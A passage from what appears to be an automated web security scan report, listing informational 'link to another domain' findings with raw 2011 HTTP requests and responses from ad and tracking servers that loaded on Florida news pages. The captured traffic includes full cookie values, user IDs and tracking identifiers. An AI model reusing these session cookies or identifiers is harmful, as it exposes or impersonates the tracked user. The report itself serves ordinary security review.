Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypn>!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; vuday1=qtDL:!1e0g7s@DV; pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypn>=!oTW~"; lifb=>MqpcO*GC#f9s%I; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!(<ypnT!!-?2!!!!.<ypnT!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!)<ypnT!!0O4!!!!*<ypn@!!0O<!!!!1<ypn@!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!0<ypn@!!J<E!!!!0<ypn@!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!)<ypnT!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!'<ypnT!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!1<ypn@!!q:E!!!!.<ypn@!!q<+!!!!/<ypn@!!q</!!!!/<ypn@!!q<3!!!!/<ypn@!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<ypn@!!tjQ!!!!)<ypnT!!ucq!!!!1<ypn@!!vRm!!!!*<ypn@!!vRq!!!!*<ypn@!!vRr!!!!*<ypn@!!vRw!!!!1<ypn@!!vRx!!!!*<ypn@!!vRy!!!!*<ypn@!!w3l!!!!)<ypnT!!wQ3!!!!)<ypnT!!wQ5!!!!)<ypnT!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!*<ypn@!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!'<ypnT!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!*<ypnB!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!*<ypn@!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!*<ypn@!#7.'!!!!*<ypn@!#7.:!!!!*<ypn@!#7.O!!!!*<ypn@!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!*<ypn@!#MTF!!!!*<ypn@!#MTH!!!!*<ypn@!#MTI!!!!*<ypn@!#MTJ!!!!*<ypn@!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N45!!!!#<xr]M!#O29!!!!'<ypnT!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!0<ypn@!#SF3!!!!0<ypn@!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!*<ypn@!#UDP!!!!0<ypn@!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!'<ypnT!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!'<ypnT!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!'<ypnT!#`S2!!!!)<ypnT!#`U0!!!!(<ypnT!#`U9!!!!'<ypnT!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!(<ypnT!#a=7!!!!(<ypnT!#a=9!!!!(<ypnT!#a=P!!!!(<ypnT!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!*<ypn@!#ai7!!!!*<ypn@!#ai?!!!!*<ypn@!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!'<ypnT!#c8W!!!!'<ypnT!#c8X!!!!'<ypnT!#c8]!!!!'<ypnT!#c?c!!!!*<ypn@!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!'<ypnT!#fG+!!!!(<ypnT!#g=!!!!!'<ypnT!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!'<ypnT!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!*<ypn@!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!*<ypn@!#tM)!!!!*<ypn@!#tn2!!!!*<ypn@!#uE=!!!!#<x9#K!#uJY!!!!0<ypn@!#uR3!!!!'<ypnT!#ujQ!!!!'<ypnT!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!*<ypn@!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!-<ypn@!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!%<ypnT!$#R7!!!!*<ypn@!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!*<ypn@!$(!P!!!!)<ypnT!$(+N!!!!#<wGkB!$(Gt!!!!-<ypn@!$(S9!!!!'<ypnT!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!)<ypnT!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!'<ypnT"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0321.rm.bf1
Set-Cookie: ih="b!!!!A!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypn>!0242!!!!#<ypnX!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:32 GMT
Set-Cookie: vuday1=[[@+$qtDL:!1e0g/LZHY; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnX=!oTr~"; path=/; expires=Wed, 08-May-2013 14:00:32 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=9,/lZ!-e1I>MqpcO*GC#@ijno; path=/; expires=Mon, 09-May-2011 22:00:32 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:32 GMT
Pragma: no-cache
Content-Length: 3803
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093460);}
</script><iframe src="http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B9e9e87971bc07a46%253B12fd50f2edc%2C0%253B%253B%253B2764451420%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA3C4P1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwCGhAEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496321806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages&redirectURL=http://clk.atdmt.com/COM/go/286738708/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/286738708/direct;wi.728;hi.90/01/" /></a></noscript></iframe> <img src='http://t.invitemedia.com/track_imp?partnerID=64&campID=64375&crID=86546&auctionID=13049496321806342-86546&cost=6.5012&pubICode=2687862&pub=347615&url=http%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=64" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...
15.9. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:15 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
15.10. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><object id='prflsD8A2040063408A460309A4900C6C0200' name='prflsD8A2040063408A460309A4900C6C0200' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 width='300' height='600' style='width:300px;height:600px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/866972/superfans_eric_banner_300x600_r02.swf?PRCampID=39497&PRPubID=colmed&PRAdSize=300x600&PRFormat=FA&PRAd=147
...[SNIP]...
15.11. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; 